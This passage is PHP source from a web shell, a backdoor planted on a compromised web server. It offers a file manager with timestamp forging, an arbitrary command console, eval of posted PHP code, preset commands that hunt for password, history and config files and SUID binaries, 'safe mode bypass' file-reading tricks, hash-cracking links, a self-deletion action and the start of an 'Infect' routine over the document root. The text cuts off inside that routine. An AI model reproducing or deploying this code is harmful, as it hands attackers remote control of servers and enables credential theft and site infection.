 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
 if( empty($_POST['p2']) )
  $_POST['p2'] = 'view';
 if( is_file($_POST['p1']) )
  $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
 else
  $m = array('Chmod', 'Rename', 'Touch');
 foreach($m as $v)
  echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
 echo '<br><br>';
 switch($_POST['p2']) {
  case 'view':
   echo '<pre class=ml1>';
   $fp = @fopen($_POST['p1'], 'r');
   if($fp) {
    while( !@feof($fp) )
     echo htmlspecialchars(@fread($fp, 1024));
    @fclose($fp);
   }
   echo '</pre>';
   break;
  case 'highlight':
   if( @is_readable($_POST['p1']) ) {
    echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
    $code = @highlight_file($_POST['p1'],true);
    echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
   }
   break;
  case 'chmod':
   if( !empty($_POST['p3']) ) {
    $perms = 0;
    for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
    if(!@chmod($_POST['p1'], $perms))
     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
   }
   clearstatcache();
   echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
   break;
  case 'edit':
   if( !is_writable($_POST['p1'])) {
    echo 'File isn\'t writeable';
    break;
   }
   if( !empty($_POST['p3']) ) {
    $time = @filemtime($_POST['p1']);
    $_POST['p3'] = substr($_POST['p3'],1);
    $fp = @fopen($_POST['p1'],"w");
    if($fp) {
     @fwrite($fp,$_POST['p3']);
     @fclose($fp);
     echo 'Saved!<br><script>p3_="";</script>';
     @touch($_POST['p1'],$time,$time);
    }
   }
   echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
   $fp = @fopen($_POST['p1'], 'r');
   if($fp) {
    while( !@feof($fp) )
     echo htmlspecialchars(@fread($fp, 1024));
    @fclose($fp);
   }
   echo '</textarea><input type=submit value=">>"></form>';
   break;
  case 'hexdump':
   $c = @file_get_contents($_POST['p1']);
   $n = 0;
   $h = array('00000000<br>','','');
   $len = strlen($c);
   for ($i=0; $i<$len; ++$i) {
    $h[1] .= sprintf('%02X',ord($c[$i])).' ';
    switch ( ord($c[$i]) ) {
     case 0:  $h[2] .= ' '; break;
     case 9:  $h[2] .= ' '; break;
     case 10: $h[2] .= ' '; break;
     case 13: $h[2] .= ' '; break;
     default: $h[2] .= $c[$i]; break;
    }
    $n++;
    if ($n == 32) {
     $n = 0;
     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
     $h[1] .= '<br>';
     $h[2] .= "\n";
    }
    }
   echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
   break;
  case 'rename':
   if( !empty($_POST['p3']) ) {
    if(!@rename($_POST['p1'], $_POST['p3']))
     echo 'Can\'t rename!<br>';
    else
     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
   }
   echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
   break;
  case 'touch':
   if( !empty($_POST['p3']) ) {
    $time = strtotime($_POST['p3']);
    if($time) {
     if(!touch($_POST['p1'],$time,$time))
      echo 'Fail!';
     else
      echo 'Touched!';
    } else echo 'Bad time format!';
   }
   clearstatcache();
   echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
   break;
 }
 echo '</div>';
 hardFooter();
}
if($os == 'win')
 $aliases = array(
  "List Directory" => "dir",
     "Find index.php in current dir" => "dir /s /w /b index.php",
     "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
     "Show active connections" => "netstat -an",
     "Show running services" => "net start",
     "User accounts" => "net user",
     "Show computers" => "net view",
  "ARP Table" => "arp -a",
  "IP Configuration" => "ipconfig /all"
 );
else
 $aliases = array(
    "List dir" => "ls -lha",
  "list file attributes on a Linux second extended file system" => "lsattr -va",
    "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
  "Find" => "",
    "find all suid files" => "find / -type f -perm -04000 -ls",
    "find suid files in current dir" => "find . -type f -perm -04000 -ls",
    "find all sgid files" => "find / -type f -perm -02000 -ls",
    "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
    "find config.inc.php files" => "find / -type f -name config.inc.php",
    "find config* files" => "find / -type f -name \"config*\"",
    "find config* files in current dir" => "find . -type f -name \"config*\"",
    "find all writable folders and files" => "find / -perm -2 -ls",
    "find all writable folders and files in current dir" => "find . -perm -2 -ls",
    "find all service.pwd files" => "find / -type f -name service.pwd",
    "find service.pwd files in current dir" => "find . -type f -name service.pwd",
    "find all .htpasswd files" => "find / -type f -name .htpasswd",
    "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
    "find all .bash_history files" => "find / -type f -name .bash_history",
    "find .bash_history files in current dir" => "find . -type f -name .bash_history",
    "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
    "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  "Locate" => "",
    "locate httpd.conf files" => "locate httpd.conf",
  "locate vhosts.conf files" => "locate vhosts.conf",
  "locate proftpd.conf files" => "locate proftpd.conf",
  "locate psybnc.conf files" => "locate psybnc.conf",
  "locate my.conf files" => "locate my.conf",
  "locate admin.php files" =>"locate admin.php",
  "locate cfg.php files" => "locate cfg.php",
  "locate conf.php files" => "locate conf.php",
  "locate config.dat files" => "locate config.dat",
  "locate config.php files" => "locate config.php",
  "locate config.inc files" => "locate config.inc",
  "locate config.inc.php" => "locate config.inc.php",
  "locate config.default.php files" => "locate config.default.php",
  "locate config* files " => "locate config",
  "locate .conf files"=>"locate '.conf'",
  "locate .pwd files" => "locate '.pwd'",
  "locate .sql files" => "locate '.sql'",
  "locate .htpasswd files" => "locate '.htpasswd'",
  "locate .bash_history files" => "locate '.bash_history'",
  "locate .mysql_history files" => "locate '.mysql_history'",
  "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  "locate backup files" => "locate backup",
  "locate dump files" => "locate dump",
  "locate priv files" => "locate priv"
 );
function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
 if(isset($_POST['ajax'])) {
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  ob_start();
  echo "d.cf.cmd.value='';\n";
  $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
  if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
   if(@chdir($match[1])) {
    $GLOBALS['cwd'] = @getcwd();
    echo "c_='".$GLOBALS['cwd']."';";
   }
  }
  echo "d.cf.output.value+='".$temp."';";
  echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
  $temp = ob_get_clean();
  echo strlen($temp), "\n", $temp;
  exit;
 }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
 hardHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
 var n = (window.Event) ? e.which : e.keyCode;
 if(n == 38) {
  cur--;
  if(cur>=0)
   document.cf.cmd.value = cmds[cur];
  else
   cur++;
 } else if(n == 40) {
  cur++;
  if(cur < cmds.length)
   document.cf.cmd.value = cmds[cur];
  else
   cur--;
 }
}
function add(cmd) {
 cmds.pop();
 cmds.push(cmd);
 cmds.push('');
 cur = cmds.length-1;
}
</script>";
 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
 foreach($GLOBALS['aliases'] as $n => $v) {
  if($v == '') {
   echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
   continue;
  }
  echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
 }
 
 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
 if(!empty($_POST['p1'])) {
  echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
 }
 echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
 echo '</form></div><script>d.cf.cmd.focus();</script>';
 hardFooter();
}
function actionPhp() {
 if( isset($_POST['ajax']) ) {
  $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  ob_start();
  eval($_POST['p1']);
  $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  echo strlen($temp), "\n", $temp;
  exit;
 }
 hardHeader();
 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  echo '<h1>PHP info</h1><div class=content>';
  ob_start();
  phpinfo();
  $tmp = ob_get_clean();
  $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  $tmp = preg_replace('!h1!msiU','h2',$tmp);
  $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  echo $tmp;
  echo '</div><br>';
 }
 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
 echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
 if(!empty($_POST['p1'])) {
  ob_start();
  eval($_POST['p1']);
  echo htmlspecialchars(ob_get_clean());
 }
 echo '</pre></div>';
 hardFooter();
}
function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
 
 if(!empty($_POST['p1'])) {
  switch($_POST['p1']) {
   case 'uploadFile':
    if ( is_array($_FILES['f']['tmp_name']) ) {
     foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
                        if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
                                echo "Can't upload file!";
       }
      }
     }
    break;
   case 'mkdir':
    if(!@mkdir($_POST['p2']))
     echo "Can't create new dir";
    break;
   case 'delete':
    function deleteDir($path) {
     $path = (substr($path,-1)=='/') ? $path:$path.'/';
     $dh  = opendir($path);
     while ( ($â = readdir($dh) ) !== false) {
      $â = $path.$â;
      if ( (basename($â) == "..") || (basename($â) == ".") )
       continue;
      $type = filetype($â);
      if ($type == "dir")
       deleteDir($â);
      else
       @unlink($â);
     }
     closedir($dh);
     @rmdir($path);
    }
    if(is_array(@$_POST['f']))
     foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
      $f = urldecode($f);
      if(is_dir($f))
       deleteDir($f);
      else
       @unlink($f);
     }
    break;
   case 'paste':
    if($_COOKIE['act'] == 'copy') {
     function copy_paste($c,$s,$d){
      if(is_dir($c.$s)){
       mkdir($d.$s);
       $h = @opendir($c.$s);
       while (($f = @readdir($h)) !== false)
        if (($f != ".") and ($f != ".."))
          copy_paste($c.$s.'/',$f, $d.$s.'/');
      } elseif(is_file($c.$s))
       @copy($c.$s, $d.$s);
     }
     foreach($_COOKIE['f'] as $f)
      copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
    } elseif($_COOKIE['act'] == 'move') {
     function move_paste($c,$s,$d){
      if(is_dir($c.$s)){
       mkdir($d.$s);
       $h = @opendir($c.$s);
       while (($f = @readdir($h)) !== false)
        if (($f != ".") and ($f != ".."))
          copy_paste($c.$s.'/',$f, $d.$s.'/');
      } elseif(@is_file($c.$s))
       @copy($c.$s, $d.$s);
     }
     foreach($_COOKIE['f'] as $f)
      @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
    } elseif($_COOKIE['act'] == 'zip') {
     if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
    } elseif($_COOKIE['act'] == 'unzip') {
     if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
    } elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
    }
    unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
    break;
   default:
                if(!empty($_POST['p1'])) {
     prototype('act', $_POST['p1']);
     prototype('f', serialize(@$_POST['f']));
     prototype('c', @$_POST['c']);
    }
    break;
  }
 }
    hardHeader();
 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
 $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
 if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
 global $sort;
 $sort = array('name', 1);
 if(!empty($_POST['p1'])) {
  if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
   $sort = array($match[1], (int)$match[2]);
 }
echo "<script>
 function sa() {
  for(i=0;i<d.files.elements.length;i++)
   if(d.files.elements[i].type == 'checkbox')
    d.files.elements[i].checked = d.files.elements[0].checked;
 }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
 $dirs = $files = array();
 $n = count($dirContent);
 for($i=0;$i<$n;$i++) {
  $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  $tmp = array('name' => $dirContent[$i],
      'path' => $GLOBALS['cwd'].$dirContent[$i],
      'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
      'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
     );
  if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
   $files[] = array_merge($tmp, array('type' => 'file'));
  elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
   $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
   $dirs[] = array_merge($tmp, array('type' => 'dir'));
 }
 $GLOBALS['sort'] = $sort;
 function cmp($a, $b) {
  if($GLOBALS['sort'][0] != 'size')
   return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  else
   return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
 }
 usort($files, "cmp");
 usort($dirs, "cmp");
 $files = array_merge($dirs, $files);
 $l = 0;
 foreach($files as $f) {
  echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
   .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  $l = $l?0:1;
 }
 echo "<tr><td colspan=7>
 <input type=hidden name=ne value=''>
 <input type=hidden name=a value='FilesMan'>
 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
    echo "<option value='tar'>+ tar.gz</option>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>â³ Paste</option>";
    echo "</select>&nbsp;";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
 hardFooter();
}
function actionStringTools() {
 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
 $stringTools = array(
  'Base64 encode' => 'base64_encode',
  'Base64 decode' => 'base64_decode',
  'Url encode' => 'urlencode',
  'Url decode' => 'urldecode',
  'Full urlencode' => 'full_urlencode',
  'md5 hash' => 'md5',
  'sha1 hash' => 'sha1',
  'crypt' => 'crypt',
  'CRC32' => 'crc32',
  'ASCII to HEX' => 'ascii2hex',
  'HEX to ASCII' => 'hex2ascii',
  'HEX to DEC' => 'hexdec',
  'HEX to BIN' => 'hex2bin',
  'DEC to HEX' => 'dechex',
  'DEC to BIN' => 'decbin',
  'BIN to HEX' => 'binhex',
  'BIN to DEC' => 'bindec',
  'String to lower case' => 'strtolower',
  'String to upper case' => 'strtoupper',
  'Htmlspecialchars' => 'htmlspecialchars',
  'String length' => 'strlen',
 );
 if(isset($_POST['ajax'])) {
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  ob_start();
  if(in_array($_POST['p1'], $stringTools))
   echo $_POST['p1']($_POST['p2']);
  $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  echo strlen($temp), "\n", $temp;
  exit;
 }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
 hardHeader();
 echo '<h1>String conversions</h1><div class=content>';
 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
 foreach($stringTools as $k => $v)
  echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
 if(!empty($_POST['p1'])) {
  if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
 }
 echo"</pre></div><br><h1>Search files:</h1><div class=content>
  <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
   <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
   <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
   <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
   <tr><td></td><td><input type='submit' value='>>'></td></tr>
   </table></form>";
 function hardRecursiveGlob($path) {
  if(substr($path, -1) != '/')
   $path.='/';
  $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
  if(is_array($paths)&&@count($paths)) {
   foreach($paths as $â) {
    if(@is_dir($â)){
     if($path!=$â)
      hardRecursiveGlob($â);
    } else {
     if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false)
      echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>";
    }
   }
  }
 }
 if(@$_POST['p3'])
  hardRecursiveGlob($_POST['c']);
 echo "</div><br><h1>Search for hash:</h1><div class=content>
  <form method='post' target='_blank' name='hf'>
   <input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
   <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
   <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
   <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
   <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
   <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
   <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
  </form></div>";
 hardFooter();
}
function actionSafeMode() {
 $temp='';
 ob_start();
 switch($_POST['p1']) {
  case 1:
   $temp=@tempnam($test, 'cx');
   if(@copy("compress.zlib://".$_POST['p2'], $temp)){
    echo @file_get_contents($temp);
    unlink($temp);
   } else
    echo 'Sorry... Can\'t open file';
   break;
  case 2:
   $files = glob($_POST['p2'].'*');
   if( is_array($files) )
    foreach ($files as $filename)
     echo $filename."\n";
   break;
  case 3:
   $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
   curl_exec($ch);
   break;
  case 4:
   ini_restore("safe_mode");
   ini_restore("open_basedir");
   include($_POST['p2']);
   break;
  case 5:
   for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
    $uid = @posix_getpwuid($_POST['p2']);
    if ($uid)
     echo join(':',$uid)."\n";
   }
   break;
  case 6:
   if(!function_exists('imap_open'))break;
   $stream = imap_open($_POST['p2'], "", "");
   if ($stream == FALSE)
    break;
   echo imap_body($stream, 1);
   imap_close($stream);
   break;
 }
 $temp = ob_get_clean();
 hardHeader();
 echo '<h1>Safe mode bypass</h1><div class=content>';
 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
 if($temp)
  echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
 echo '</div>';
 hardFooter();
}
function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
 die('bye!');
}
function actionSelfRemove() {
 if($_POST['p1'] == 'yes')
  if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
   die('Shell has been removed');
  else
   echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        hardHeader();
 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
 hardFooter();
}
function actionInfect() {
 hardHeader();
 echo '<h1>Infect</h1><div class=content>';
 if($_POST['p1'] == 'infect') {
  $target=$_SERVER['DOCUMENT_ROOT'];
   function ListFiles($dir) {
    if($dh = opendir($dir)) {
     $files = Array();
     $inner_files = Array();
     while($file = readdir($dh)) {
      if($file != "." && $file != "..") {
       if(is_dir($dir . "/" . $file)) {
        $inner_files = ListFiles($dir . "/" . $file);
        if(is_array($inner_files)) $files = array_merge($files, $inner_files);
